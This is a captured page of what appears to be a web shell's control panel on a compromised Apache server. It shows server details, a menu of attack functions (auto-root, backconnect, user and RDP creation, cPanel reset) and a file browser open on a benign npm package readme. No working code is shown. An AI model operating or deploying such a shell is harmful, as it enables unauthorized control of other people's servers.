Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
from /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
drwxrwxr-x
.npmignore
13
B
-rw-rw-r--
.travis.yml
62
B
-rw-rw-r--
LICENSE.APACHE2
586
B
-rw-rw-r--
LICENSE.MIT
1.06
KB
-rw-rw-r--
index.js
1.43
KB
-rw-rw-r--
package.json
530
B
-rw-rw-r--
readme.markdown
872
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.markdown
[](https://travis-ci.org/nmhnmh/from) # from An easy way to create a `readable Stream`. ## from(function getChunk(count, next)) from takes a `getChunk` function and returns a stream. `getChunk` is called again and again, after each time the user calls `next()`, until the user emits `'end'` if `pause()` is called, the `getChunk` won't be called again untill `resume()` is called. ```js var from = require('from') var stream = from(function getChunk(count, next) { //do some sort of data this.emit('data', whatever) if(itsOver) this.emit('end') //ready to handle the next chunk next() //or, if it's sync: return true }) ``` ## from(array) from also takes an `Array` whose elements it emits one after another. ## License MIT / Apache2
Close